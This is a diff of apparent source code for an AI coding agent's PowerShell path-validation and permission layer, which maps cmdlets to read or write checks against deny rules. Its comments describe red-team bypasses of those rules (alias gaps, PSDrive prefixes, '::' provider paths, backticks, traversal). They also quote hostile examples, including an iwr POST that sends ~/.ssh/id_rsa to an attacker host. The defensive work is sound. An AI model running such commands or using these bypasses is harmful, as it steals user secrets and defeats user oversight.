+ pathParams: ['-filepath', '-path', '-literalpath', '-pspath', '-lp'],
129
+ knownSwitches: ['-append'],
130
+ knownValueParams: ['-inputobject', '-variable', '-encoding'],
131
+ },
132
+ 'export-csv': {
133
+ operationType: 'write',
134
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
135
+ knownSwitches: [
136
+ '-append',
137
+ '-force',
138
+ '-noclobber',
139
+ '-notypeinformation',
140
+ '-includetypeinformation',
141
+ '-useculture',
142
+ '-noheader',
143
+ '-whatif',
144
+ '-confirm',
145
+ ],
146
+ knownValueParams: [
147
+ '-inputobject',
148
+ '-delimiter',
149
+ '-encoding',
150
+ '-quotefields',
151
+ '-usequotes',
152
+ ],
153
+ },
154
+ 'export-clixml': {
155
+ operationType: 'write',
156
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
157
+ knownSwitches: ['-force', '-noclobber', '-whatif', '-confirm'],
158
+ knownValueParams: ['-inputobject', '-depth', '-encoding'],
159
+ },
160
+ // New-Item/Copy-Item/Move-Item were missing: `mkdir /etc/cron.d/evil` →
161
+ // resolveToCanonical('mkdir') = 'new-item' via COMMON_ALIASES → not in
162
+ // config → early return {paths:[], 'read'} → Edit deny never consulted.
163
+ //
164
+ // Copy-Item/Move-Item have DUAL path params (-Path source, -Destination
165
+ // dest). operationType:'write' is imperfect — source is semantically a read
166
+ // — but it means BOTH paths get Edit-deny validation, which is strictly
167
+ // safer than extracting neither. A per-param operationType would be ideal
168
+ // but that's a bigger schema change; blunt 'write' closes the gap now.
169
+ 'new-item': {
170
+ operationType: 'write',
171
+ // -Path is position 0. -Name (position 1) is resolved by PowerShell
172
+ // RELATIVE TO -Path (per MS docs: "you can specify the path of the new
173
+ // item in Name"), including `..` traversal. We resolve against CWD
174
+ // (validatePath L930), not -Path — so `New-Item -Path /allowed
175
+ // -Name ../secret/evil` creates /allowed/../secret/evil = /secret/evil,
176
+ // but we resolve cwd/../secret/evil which lands ELSEWHERE and can miss
177
+ // the deny rule. This is a deny→ask downgrade, not fail-safe.
178
+ //
179
+ // -name is in leafOnlyPathParams: simple leaf filenames (`foo.txt`) are
180
+ // extracted (resolves to cwd/foo.txt — slightly wrong, but -Path
181
+ // extraction covers the directory, and a leaf can't traverse);
182
+ // any value with `/`, `\`, `.`, `..` flags hasUnvalidatablePathArg →
183
+ // ask. Joining -Name against -Path would be correct but needs
184
+ // cross-parameter tracking — out of scope here.
185
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
186
+ leafOnlyPathParams: ['-name'],
187
+ knownSwitches: ['-force', '-whatif', '-confirm', '-usetransaction'],
188
+ knownValueParams: ['-itemtype', '-value', '-credential', '-type'],
189
+ },
190
+ 'copy-item': {
191
+ operationType: 'write',
192
+ // -Path (position 0) is source, -Destination (position 1) is dest.
193
+ // Both extracted; both validated as write.
194
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp', '-destination'],
195
+ knownSwitches: [
196
+ '-container',
197
+ '-force',
198
+ '-passthru',
199
+ '-recurse',
200
+ '-whatif',
201
+ '-confirm',
202
+ '-usetransaction',
203
+ ],
204
+ knownValueParams: [
205
+ '-filter',
206
+ '-include',
207
+ '-exclude',
208
+ '-credential',
209
+ '-fromsession',
210
+ '-tosession',
211
+ ],
212
+ },
213
+ 'move-item': {
214
+ operationType: 'write',
215
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp', '-destination'],
216
+ knownSwitches: [
217
+ '-force',
218
+ '-passthru',
219
+ '-whatif',
220
+ '-confirm',
221
+ '-usetransaction',
222
+ ],
223
+ knownValueParams: ['-filter', '-include', '-exclude', '-credential'],
224
+ },
225
+ // rename-item/set-item: same class — ren/rni/si in COMMON_ALIASES, neither
226
+ // was in config. `ren /etc/passwd passwd.bak` → resolves to rename-item
227
+ // → not in config → {paths:[], 'read'} → Edit deny bypassed. This closes
228
+ // the COMMON_ALIASES→CMDLET_PATH_CONFIG coverage audit: every
229
+ // write-cmdlet alias now resolves to a config entry.
230
+ 'rename-item': {
231
+ operationType: 'write',
232
+ // -Path position 0, -NewName position 1. -NewName is leaf-only (docs:
233
+ // "You cannot specify a new drive or a different path") and Rename-Item
234
+ // explicitly rejects `..` in it — so knownValueParams is correct here,
235
+ // unlike New-Item -Name which accepts traversal.
236
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
237
+ knownSwitches: [
238
+ '-force',
239
+ '-passthru',
240
+ '-whatif',
241
+ '-confirm',
242
+ '-usetransaction',
243
+ ],
244
+ knownValueParams: [
245
+ '-newname',
246
+ '-credential',
247
+ '-filter',
248
+ '-include',
249
+ '-exclude',
250
+ ],
251
+ },
252
+ 'set-item': {
253
+ operationType: 'write',
254
+ // FileSystem provider throws NotSupportedException for Set-Item content,
255
+ // so the practical write surface is registry/env/function/alias providers.
256
+ // Provider-qualified paths (HKLM:\\, Env:\\) are independently caught at
257
+ // step 3.5 in powershellPermissions.ts, but classifying set-item as write
258
+ // here is defense-in-depth — powershellSecurity.ts:379 already lists it
259
+ // in ENV_WRITE_CMDLETS; this makes pathValidation consistent.
260
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
261
+ knownSwitches: [
262
+ '-force',
263
+ '-passthru',
264
+ '-whatif',
265
+ '-confirm',
266
+ '-usetransaction',
267
+ ],
268
+ knownValueParams: [
269
+ '-value',
270
+ '-credential',
271
+ '-filter',
272
+ '-include',
273
+ '-exclude',
274
+ ],
275
+ },
276
+ // ─── Read operations ──────────────────────────────────────────────────────
277
+ 'get-content': {
278
+ operationType: 'read',
279
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
280
+ knownSwitches: [
281
+ '-force',
282
+ '-usetransaction',
283
+ '-wait',
284
+ '-raw',
285
+ '-asbytestream', // PS 6+
286
+ ],
287
+ knownValueParams: [
288
+ '-readcount',
289
+ '-totalcount',
290
+ '-tail',
291
+ '-first', // alias for -TotalCount
292
+ '-head', // alias for -TotalCount
293
+ '-last', // alias for -Tail
294
+ '-filter',
295
+ '-include',
296
+ '-exclude',
297
+ '-credential',
298
+ '-delimiter',
299
+ '-encoding',
300
+ '-stream',
301
+ ],
302
+ },
303
+ 'get-childitem': {
304
+ operationType: 'read',
305
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
306
+ knownSwitches: [
307
+ '-recurse',
308
+ '-force',
309
+ '-name',
310
+ '-usetransaction',
311
+ '-followsymlink',
312
+ '-directory',
313
+ '-file',
314
+ '-hidden',
315
+ '-readonly',
316
+ '-system',
317
+ ],
318
+ knownValueParams: [
319
+ '-filter',
320
+ '-include',
321
+ '-exclude',
322
+ '-depth',
323
+ '-attributes',
324
+ '-credential',
325
+ ],
326
+ },
327
+ 'get-item': {
328
+ operationType: 'read',
329
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
330
+ knownSwitches: ['-force', '-usetransaction'],
331
+ knownValueParams: [
332
+ '-filter',
333
+ '-include',
334
+ '-exclude',
335
+ '-credential',
336
+ '-stream',
337
+ ],
338
+ },
339
+ 'get-itemproperty': {
340
+ operationType: 'read',
341
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
342
+ knownSwitches: ['-usetransaction'],
343
+ knownValueParams: [
344
+ '-name',
345
+ '-filter',
346
+ '-include',
347
+ '-exclude',
348
+ '-credential',
349
+ ],
350
+ },
351
+ 'get-itempropertyvalue': {
352
+ operationType: 'read',
353
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
354
+ knownSwitches: ['-usetransaction'],
355
+ knownValueParams: [
356
+ '-name',
357
+ '-filter',
358
+ '-include',
359
+ '-exclude',
360
+ '-credential',
361
+ ],
362
+ },
363
+ 'get-filehash': {
364
+ operationType: 'read',
365
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
366
+ knownSwitches: [],
367
+ knownValueParams: ['-algorithm', '-inputstream'],
368
+ },
369
+ 'get-acl': {
370
+ operationType: 'read',
371
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
372
+ knownSwitches: ['-audit', '-allcentralaccesspolicies', '-usetransaction'],
373
+ knownValueParams: ['-inputobject', '-filter', '-include', '-exclude'],
374
+ },
375
+ 'format-hex': {
376
+ operationType: 'read',
377
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
378
+ knownSwitches: ['-raw'],
379
+ knownValueParams: [
380
+ '-inputobject',
381
+ '-encoding',
382
+ '-count', // PS 6+
383
+ '-offset', // PS 6+
384
+ ],
385
+ },
386
+ 'test-path': {
387
+ operationType: 'read',
388
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
389
+ knownSwitches: ['-isvalid', '-usetransaction'],
390
+ knownValueParams: [
391
+ '-filter',
392
+ '-include',
393
+ '-exclude',
394
+ '-pathtype',
395
+ '-credential',
396
+ '-olderthan',
397
+ '-newerthan',
398
+ ],
399
+ },
400
+ 'resolve-path': {
401
+ operationType: 'read',
402
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
403
+ knownSwitches: ['-relative', '-usetransaction', '-force'],
404
+ knownValueParams: ['-credential', '-relativebasepath'],
405
+ },
406
+ 'convert-path': {
407
+ operationType: 'read',
408
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
409
+ knownSwitches: ['-usetransaction'],
410
+ knownValueParams: [],
411
+ },
412
+ 'select-string': {
413
+ operationType: 'read',
414
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
415
+ knownSwitches: [
416
+ '-simplematch',
417
+ '-casesensitive',
418
+ '-quiet',
419
+ '-list',
420
+ '-notmatch',
421
+ '-allmatches',
422
+ '-noemphasis', // PS 7+
423
+ '-raw', // PS 7+
424
+ ],
425
+ knownValueParams: [
426
+ '-inputobject',
427
+ '-pattern',
428
+ '-include',
429
+ '-exclude',
430
+ '-encoding',
431
+ '-context',
432
+ '-culture', // PS 7+
433
+ ],
434
+ },
435
+ 'set-location': {
436
+ operationType: 'read',
437
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
438
+ knownSwitches: ['-passthru', '-usetransaction'],
439
+ knownValueParams: ['-stackname'],
440
+ },
441
+ 'push-location': {
442
+ operationType: 'read',
443
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
444
+ knownSwitches: ['-passthru', '-usetransaction'],
445
+ knownValueParams: ['-stackname'],
446
+ },
447
+ 'pop-location': {
448
+ operationType: 'read',
449
+ // Pop-Location has no -Path/-LiteralPath (it pops from the stack),
450
+ // but we keep the entry so it passes through path validation gracefully.
451
+ pathParams: [],
452
+ knownSwitches: ['-passthru', '-usetransaction'],
453
+ knownValueParams: ['-stackname'],
454
+ },
455
+ 'select-xml': {
456
+ operationType: 'read',
457
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
458
+ knownSwitches: [],
459
+ knownValueParams: ['-xml', '-content', '-xpath', '-namespace'],
460
+ },
461
+ 'get-winevent': {
462
+ operationType: 'read',
463
+ // Get-WinEvent only has -Path, no -LiteralPath
464
+ pathParams: ['-path'],
465
+ knownSwitches: ['-force', '-oldest'],
466
+ knownValueParams: [
467
+ '-listlog',
468
+ '-logname',
469
+ '-listprovider',
470
+ '-providername',
471
+ '-maxevents',
472
+ '-computername',
473
+ '-credential',
474
+ '-filterxpath',
475
+ '-filterxml',
476
+ '-filterhashtable',
477
+ ],
478
+ },
479
+ // Write-path cmdlets with output parameters. Without these entries,
480
+ // -OutFile / -DestinationPath would write to arbitrary paths unvalidated.
481
+ 'invoke-webrequest': {
482
+ operationType: 'write',
483
+ // -OutFile is the write target; -InFile is a read source (uploads a local
484
+ // file). Both are in pathParams so Edit deny rules are consulted (this
485
+ // config is operationType:write → permissionType:edit). A user with
486
+ // Edit(~/.ssh/**) deny blocks `iwr https://attacker -Method POST
487
+ // -InFile ~/.ssh/id_rsa` exfil. Read-only deny rules are not consulted
488
+ // for write-type cmdlets — that's a known limitation of the
489
+ // operationType→permissionType mapping.
490
+ pathParams: ['-outfile', '-infile'],
491
+ positionalSkip: 1, // positional-0 is -Uri (URL), not a filesystem path
492
+ optionalWrite: true, // only writes with -OutFile; bare iwr is pipeline-only
493
+ knownSwitches: [
494
+ '-allowinsecureredirect',
495
+ '-allowunencryptedauthentication',
496
+ '-disablekeepalive',
497
+ '-nobodyprogress',
498
+ '-passthru',
499
+ '-preservefileauthorizationmetadata',
500
+ '-resume',
501
+ '-skipcertificatecheck',
502
+ '-skipheadervalidation',
503
+ '-skiphttperrorcheck',
504
+ '-usebasicparsing',
505
+ '-usedefaultcredentials',
506
+ ],
507
+ knownValueParams: [
508
+ '-uri',
509
+ '-method',
510
+ '-body',
511
+ '-contenttype',
512
+ '-headers',
513
+ '-maximumredirection',
514
+ '-maximumretrycount',
515
+ '-proxy',
516
+ '-proxycredential',
517
+ '-retryintervalsec',
518
+ '-sessionvariable',
519
+ '-timeoutsec',
520
+ '-token',
521
+ '-transferencoding',
522
+ '-useragent',
523
+ '-websession',
524
+ '-credential',
525
+ '-authentication',
526
+ '-certificate',
527
+ '-certificatethumbprint',
528
+ '-form',
529
+ '-httpversion',
530
+ ],
531
+ },
532
+ 'invoke-restmethod': {
533
+ operationType: 'write',
534
+ // -OutFile is the write target; -InFile is a read source (uploads a local
535
+ // file). Both must be in pathParams so deny rules are consulted.
536
+ pathParams: ['-outfile', '-infile'],
537
+ positionalSkip: 1, // positional-0 is -Uri (URL), not a filesystem path
538
+ optionalWrite: true, // only writes with -OutFile; bare irm is pipeline-only
539
+ knownSwitches: [
540
+ '-allowinsecureredirect',
541
+ '-allowunencryptedauthentication',
542
+ '-disablekeepalive',
543
+ '-followrellink',
544
+ '-nobodyprogress',
545
+ '-passthru',
546
+ '-preservefileauthorizationmetadata',
547
+ '-resume',
548
+ '-skipcertificatecheck',
549
+ '-skipheadervalidation',
550
+ '-skiphttperrorcheck',
551
+ '-usebasicparsing',
552
+ '-usedefaultcredentials',
553
+ ],
554
+ knownValueParams: [
555
+ '-uri',
556
+ '-method',
557
+ '-body',
558
+ '-contenttype',
559
+ '-headers',
560
+ '-maximumfollowrellink',
561
+ '-maximumredirection',
562
+ '-maximumretrycount',
563
+ '-proxy',
564
+ '-proxycredential',
565
+ '-responseheaderstvariable',
566
+ '-retryintervalsec',
567
+ '-sessionvariable',
568
+ '-statuscodevariable',
569
+ '-timeoutsec',
570
+ '-token',
571
+ '-transferencoding',
572
+ '-useragent',
573
+ '-websession',
574
+ '-credential',
575
+ '-authentication',
576
+ '-certificate',
577
+ '-certificatethumbprint',
578
+ '-form',
579
+ '-httpversion',
580
+ ],
581
+ },
582
+ 'expand-archive': {
583
+ operationType: 'write',
584
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp', '-destinationpath'],
585
+ knownSwitches: ['-force', '-passthru', '-whatif', '-confirm'],
586
+ knownValueParams: [],
587
+ },
588
+ 'compress-archive': {
589
+ operationType: 'write',
590
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp', '-destinationpath'],
591
+ knownSwitches: ['-force', '-update', '-passthru', '-whatif', '-confirm'],
592
+ knownValueParams: ['-compressionlevel'],
593
+ },
594
+ // *-ItemProperty cmdlets: primary use is the Registry provider (set/new/
595
+ // remove a registry VALUE under a key). Provider-qualified paths (HKLM:\,
596
+ // HKCU:\) are independently caught at step 3.5 in powershellPermissions.ts.
597
+ // Entries here are defense-in-depth for Edit-deny-rule consultation, mirroring
598
+ // set-item's rationale.
599
+ 'set-itemproperty': {
600
+ operationType: 'write',
601
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
602
+ knownSwitches: [
603
+ '-passthru',
604
+ '-force',
605
+ '-whatif',
606
+ '-confirm',
607
+ '-usetransaction',
608
+ ],
609
+ knownValueParams: [
610
+ '-name',
611
+ '-value',
612
+ '-type',
613
+ '-filter',
614
+ '-include',
615
+ '-exclude',
616
+ '-credential',
617
+ '-inputobject',
618
+ ],
619
+ },
620
+ 'new-itemproperty': {
621
+ operationType: 'write',
622
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
623
+ knownSwitches: ['-force', '-whatif', '-confirm', '-usetransaction'],
624
+ knownValueParams: [
625
+ '-name',
626
+ '-value',
627
+ '-propertytype',
628
+ '-type',
629
+ '-filter',
630
+ '-include',
631
+ '-exclude',
632
+ '-credential',
633
+ ],
634
+ },
635
+ 'remove-itemproperty': {
636
+ operationType: 'write',
637
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
638
+ knownSwitches: ['-force', '-whatif', '-confirm', '-usetransaction'],
639
+ knownValueParams: [
640
+ '-name',
641
+ '-filter',
642
+ '-include',
643
+ '-exclude',
644
+ '-credential',
645
+ ],
646
+ },
647
+ 'clear-item': {
648
+ operationType: 'write',
649
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
650
+ knownSwitches: ['-force', '-whatif', '-confirm', '-usetransaction'],
651
+ knownValueParams: ['-filter', '-include', '-exclude', '-credential'],
652
+ },
653
+ 'export-alias': {
654
+ operationType: 'write',
655
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
656
+ knownSwitches: [
657
+ '-append',
658
+ '-force',
659
+ '-noclobber',
660
+ '-passthru',
661
+ '-whatif',
662
+ '-confirm',
663
+ ],
664
+ knownValueParams: ['-name', '-description', '-scope', '-as'],
665
+ },
666
+ };
667
+ /**
668
+ * Checks if a lowercase parameter name (with leading dash) matches any entry
669
+ * in the given param list, accounting for PowerShell's prefix-matching behavior
670
+ * (e.g., -Lit matches -LiteralPath).
671
+ */
672
+ function matchesParam(paramLower, paramList) {
673
+ for (const p of paramList) {
674
+ if (p === paramLower ||
675
+ (paramLower.length > 1 && p.startsWith(paramLower))) {
676
+ return true;
677
+ }
678
+ }
679
+ return false;
680
+ }
681
+ /**
682
+ * Returns true if a colon-syntax value contains expression constructs that
683
+ * mask the real runtime path (arrays, subexpressions, variables, backtick
684
+ * escapes). The outer CommandParameterAst 'Parameter' element type hides
685
+ * these from our AST walk, so we must detect them textually.
686
+ *
687
+ * Used in three branches of extractPathsFromCommand: pathParams,
688
+ * leafOnlyPathParams, and the unknown-param defense-in-depth branch.
689
+ */
690
+ function hasComplexColonValue(rawValue) {
691
+ return (rawValue.includes(',') ||
692
+ rawValue.startsWith('(') ||
693
+ rawValue.startsWith('[') ||
694
+ rawValue.includes('`') ||
695
+ rawValue.includes('@(') ||
696
+ rawValue.startsWith('@{') ||
697
+ rawValue.includes('$'));
698
+ }
699
+ function formatDirectoryList(directories) {
700
+ const dirCount = directories.length;
701
+ if (dirCount <= MAX_DIRS_TO_LIST) {
702
+ return directories.map(dir => `'${dir}'`).join(', ');
703
+ }
704
+ const firstDirs = directories
705
+ .slice(0, MAX_DIRS_TO_LIST)
706
+ .map(dir => `'${dir}'`)
707
+ .join(', ');
708
+ return `${firstDirs}, and ${dirCount - MAX_DIRS_TO_LIST} more`;
709
+ }
710
+ /**
711
+ * Expands tilde (~) at the start of a path to the user's home directory.
712
+ */
713
+ function expandTilde(filePath) {
714
+ if (filePath === '~' ||
715
+ filePath.startsWith('~/') ||
716
+ filePath.startsWith('~\\')) {
717
+ return homedir() + filePath.slice(1);
718
+ }
719
+ return filePath;
720
+ }
721
+ /**
722
+ * Checks the raw user-provided path (pre-realpath) for dangerous removal
723
+ * targets. safeResolvePath/realpathSync canonicalizes in ways that defeat
724
+ * isDangerousRemovalPath: on Windows '/' → 'C:\' (fails the === '/' check);
725
+ * on macOS homedir() may be under /var which realpathSync rewrites to
726
+ * /private/var (fails the === homedir() check). Checking the tilde-expanded,
727
+ * backslash-normalized form catches the dangerous shapes (/, ~, /etc, /usr)
728
+ * as the user typed them.
729
+ */
730
+ export function isDangerousRemovalRawPath(filePath) {
731
+ const expanded = expandTilde(filePath.replace(/^['"]|['"]$/g, '')).replace(/\\/g, '/');
732
+ return isDangerousRemovalPath(expanded);
733
+ }
734
+ export function dangerousRemovalDeny(path) {
735
+ return {
736
+ behavior: 'deny',
737
+ message: `Remove-Item on system path '${path}' is blocked. This path is protected from removal.`,
738
+ decisionReason: {
739
+ type: 'other',
740
+ reason: 'Removal targets a protected system path',
741
+ },
742
+ };
743
+ }
744
+ /**
745
+ * Checks if a resolved path is allowed for the given operation type.
746
+ * Mirrors the logic in BashTool/pathValidation.ts isPathAllowed.
747
+ */
748
+ function isPathAllowed(resolvedPath, context, operationType, precomputedPathsToCheck) {
749
+ const permissionType = operationType === 'read' ? 'read' : 'edit';
750
+ // 1. Check deny rules first
751
+ const denyRule = matchingRuleForInput(resolvedPath, context, permissionType, 'deny');
752
+ if (denyRule !== null) {
753
+ return {
754
+ allowed: false,
755
+ decisionReason: { type: 'rule', rule: denyRule },
756
+ };
757
+ }
758
+ // 2. For write/create operations, check internal editable paths (plan files, scratchpad, agent memory, job dirs)
759
+ // This MUST come before checkPathSafetyForAutoEdit since .claude is a dangerous directory
760
+ // and internal editable paths live under ~/.claude/ — matching the ordering in
761
+ // checkWritePermissionForTool (filesystem.ts step 1.5)
762
+ if (operationType !== 'read') {
763
+ const internalEditResult = checkEditableInternalPath(resolvedPath, {});
764
+ if (internalEditResult.behavior === 'allow') {
765
+ return {
766
+ allowed: true,
767
+ decisionReason: internalEditResult.decisionReason,
768
+ };
769
+ }
770
+ }
771
+ // 2.5. For write/create operations, check safety validations
772
+ if (operationType !== 'read') {
773
+ const safetyCheck = checkPathSafetyForAutoEdit(resolvedPath, precomputedPathsToCheck);
774
+ if (!safetyCheck.safe) {
775
+ return {
776
+ allowed: false,
777
+ decisionReason: {
778
+ type: 'safetyCheck',
779
+ reason: safetyCheck.message,
780
+ classifierApprovable: safetyCheck.classifierApprovable,
781
+ },
782
+ };
783
+ }
784
+ }
785
+ // 3. Check if path is in allowed working directory
786
+ const isInWorkingDir = pathInAllowedWorkingPath(resolvedPath, context, precomputedPathsToCheck);
787
+ if (isInWorkingDir) {
788
+ if (operationType === 'read' || context.mode === 'acceptEdits') {
789
+ return { allowed: true };
790
+ }
791
+ }
792
+ // 3.5. For read operations, check internal readable paths
793
+ if (operationType === 'read') {
794
+ const internalReadResult = checkReadableInternalPath(resolvedPath, {});
795
+ if (internalReadResult.behavior === 'allow') {
796
+ return {
797
+ allowed: true,
798
+ decisionReason: internalReadResult.decisionReason,
799
+ };
800
+ }
801
+ }
802
+ // 3.7. For write/create operations to paths OUTSIDE the working directory,
803
+ // check the sandbox write allowlist. When the sandbox is enabled, users
804
+ // have explicitly configured writable directories (e.g. /tmp/claude/) —
805
+ // treat these as additional allowed write directories so redirects/Out-File/
806
+ // New-Item don't prompt unnecessarily. Paths IN the working directory are
807
+ // excluded: the sandbox allowlist always seeds '.' (cwd), which would
808
+ // bypass the acceptEdits gate at step 3.
809
+ if (operationType !== 'read' &&
810
+ !isInWorkingDir &&
811
+ isPathInSandboxWriteAllowlist(resolvedPath)) {
812
+ return {
813
+ allowed: true,
814
+ decisionReason: {
815
+ type: 'other',
816
+ reason: 'Path is in sandbox write allowlist',
817
+ },
818
+ };
819
+ }
820
+ // 4. Check allow rules
821
+ const allowRule = matchingRuleForInput(resolvedPath, context, permissionType, 'allow');
822
+ if (allowRule !== null) {
823
+ return {
824
+ allowed: true,
825
+ decisionReason: { type: 'rule', rule: allowRule },
826
+ };
827
+ }
828
+ // 5. Path is not allowed
829
+ return { allowed: false };
830
+ }
831
+ /**
832
+ * Best-effort deny check for paths obscured by :: or backtick syntax.
833
+ * ONLY checks deny rules — never auto-allows. If the stripped guess
834
+ * doesn't match a deny rule, we fall through to ask as before.
835
+ */
836
+ function checkDenyRuleForGuessedPath(strippedPath, cwd, toolPermissionContext, operationType) {
837
+ // Red-team P7: null bytes make expandPath throw. Pre-existing but
838
+ // defend here since we're introducing a new call path.
839
+ if (!strippedPath || strippedPath.includes('\0'))
840
+ return null;
841
+ // Red-team P3: `~/.ssh/x strips to ~/.ssh/x but expandTilde only fires
842
+ // on leading ~ — the backtick was in front of it. Re-run here.
843
+ const tildeExpanded = expandTilde(strippedPath);
844
+ const abs = isAbsolute(tildeExpanded)
845
+ ? tildeExpanded
846
+ : resolve(cwd, tildeExpanded);
847
+ const { resolvedPath } = safeResolvePath(getFsImplementation(), abs);
848
+ const permissionType = operationType === 'read' ? 'read' : 'edit';
849
+ const denyRule = matchingRuleForInput(resolvedPath, toolPermissionContext, permissionType, 'deny');
850
+ return denyRule ? { resolvedPath, rule: denyRule } : null;
851
+ }
852
+ /**
853
+ * Validates a file system path, handling tilde expansion.
854
+ */
855
+ function validatePath(filePath, cwd, toolPermissionContext, operationType) {
856
+ // Remove surrounding quotes if present
857
+ const cleanPath = expandTilde(filePath.replace(/^['"]|['"]$/g, ''));
858
+ // SECURITY: PowerShell Core normalizes backslashes to forward slashes on all
859
+ // platforms, but path.resolve on Linux/Mac treats them as literal characters.
860
+ // Normalize before resolution so traversal patterns like dir\..\..\etc\shadow
861
+ // are correctly detected.
862
+ const normalizedPath = cleanPath.replace(/\\/g, '/');
863
+ // SECURITY: Backtick (`) is PowerShell's escape character. It is a no-op in
864
+ // many positions (e.g., `/ === /) but defeats Node.js path checks like
865
+ // isAbsolute(). Redirection targets use raw .Extent.Text which preserves
866
+ // backtick escapes. Treat any path containing a backtick as unvalidatable.
867
+ if (normalizedPath.includes('`')) {
868
+ // Red-team P3: backtick is already resolved for StringConstant args
869
+ // (parser uses .value); this guard primarily fires for redirection
870
+ // targets which use raw .Extent.Text. Strip is a no-op for most special
871
+ // escapes (`n → n) but that's fine — wrong guess → no deny match →
872
+ // falls to ask.
873
+ const backtickStripped = normalizedPath.replace(/`/g, '');
874
+ const denyHit = checkDenyRuleForGuessedPath(backtickStripped, cwd, toolPermissionContext, operationType);
875
+ if (denyHit) {
876
+ return {
877
+ allowed: false,
878
+ resolvedPath: denyHit.resolvedPath,
879
+ decisionReason: { type: 'rule', rule: denyHit.rule },
880
+ };
881
+ }
882
+ return {
883
+ allowed: false,
884
+ resolvedPath: normalizedPath,
885
+ decisionReason: {
886
+ type: 'other',
887
+ reason: 'Backtick escape characters in paths cannot be statically validated and require manual approval',
888
+ },
889
+ };
890
+ }
891
+ // SECURITY: Block module-qualified provider paths. PowerShell allows
892
+ // `Microsoft.PowerShell.Core\FileSystem::/etc/passwd` which resolves to
893
+ // `/etc/passwd` via the FileSystem provider. The `::` is the provider
894
+ // path separator and doesn't match the simple `^[a-z]{2,}:` regex.
895
+ if (normalizedPath.includes('::')) {
896
+ // Strip everything up to and including the first :: — handles both
897
+ // FileSystem::/path and Microsoft.PowerShell.Core\FileSystem::/path.
898
+ // Double-:: (Foo::Bar::/x) strips first only → 'Bar::/x' → resolve
899
+ // makes it {cwd}/Bar::/x → won't match real deny rules → falls to ask.
900
+ // Safe.
901
+ const afterProvider = normalizedPath.slice(normalizedPath.indexOf('::') + 2);
902
+ const denyHit = checkDenyRuleForGuessedPath(afterProvider, cwd, toolPermissionContext, operationType);
903
+ if (denyHit) {
904
+ return {
905
+ allowed: false,
906
+ resolvedPath: denyHit.resolvedPath,
907
+ decisionReason: { type: 'rule', rule: denyHit.rule },
908
+ };
909
+ }
910
+ return {
911
+ allowed: false,
912
+ resolvedPath: normalizedPath,
913
+ decisionReason: {
914
+ type: 'other',
915
+ reason: 'Module-qualified provider paths (::) cannot be statically validated and require manual approval',
916
+ },
917
+ };
918
+ }
919
+ // SECURITY: Block UNC paths — they can trigger network requests and
920
+ // leak NTLM/Kerberos credentials
921
+ if (normalizedPath.startsWith('//') ||
922
+ /DavWWWRoot/i.test(normalizedPath) ||
923
+ /@SSL@/i.test(normalizedPath)) {
924
+ return {
925
+ allowed: false,
926
+ resolvedPath: normalizedPath,
927
+ decisionReason: {
928
+ type: 'other',
929
+ reason: 'UNC paths are blocked because they can trigger network requests and credential leakage',
930
+ },
931
+ };
932
+ }
933
+ // SECURITY: Reject paths containing shell expansion syntax
934
+ if (normalizedPath.includes('$') || normalizedPath.includes('%')) {
935
+ return {
936
+ allowed: false,
937
+ resolvedPath: normalizedPath,
938
+ decisionReason: {
939
+ type: 'other',
940
+ reason: 'Variable expansion syntax in paths requires manual approval',
941
+ },
942
+ };
943
+ }
944
+ // SECURITY: Block non-filesystem provider paths (env:, HKLM:, alias:, function:, etc.)
945
+ // These paths access non-filesystem resources and must require manual approval.
946
+ // This catches colon-syntax like -Path:env:HOME where the extracted value is 'env:HOME'.
947
+ //
948
+ // Platform split (findings #21/#28):
949
+ // - Windows: require 2+ letters before ':' so native drive letters (C:, D:)
950
+ // pass through to path.win32.isAbsolute/resolve which handle them correctly.
951
+ // - POSIX: ANY <letters>: prefix is a PowerShell PSDrive — single-letter drive
952
+ // paths have no native meaning on Linux/macOS. `New-PSDrive -Name Z -Root /etc`
953
+ // then `Get-Content Z:/secrets` would otherwise resolve via
954
+ // path.posix.resolve(cwd, 'Z:/secrets') → '{cwd}/Z:/secrets' → inside cwd →
955
+ // allowed, bypassing Read(/etc/**) deny rules. We cannot statically know what
956
+ // filesystem root a PSDrive maps to, so treat all drive-prefixed paths on
957
+ // POSIX as unvalidatable.
958
+ // Include digits in PSDrive name (bug #23): `New-PSDrive -Name 1 ...`
959
+ // creates drive `1:` — a valid PSDrive path prefix.
960
+ // Windows regex requires 2+ chars to exclude single-letter native drive letters
961
+ // (C:, D:). Use a single character class [a-z0-9] to catch mixed alphanumeric
962
+ // PSDrive names like `a1:`, `1a:` — the previous alternation `[a-z]{2,}|[0-9]+`
963
+ // missed those since `a1` is neither pure letters nor pure digits.
964
+ const providerPathRegex = getPlatform() === 'windows' ? /^[a-z0-9]{2,}:/i : /^[a-z0-9]+:/i;
965
+ if (providerPathRegex.test(normalizedPath)) {
966
+ return {
967
+ allowed: false,
968
+ resolvedPath: normalizedPath,
969
+ decisionReason: {
970
+ type: 'other',
971
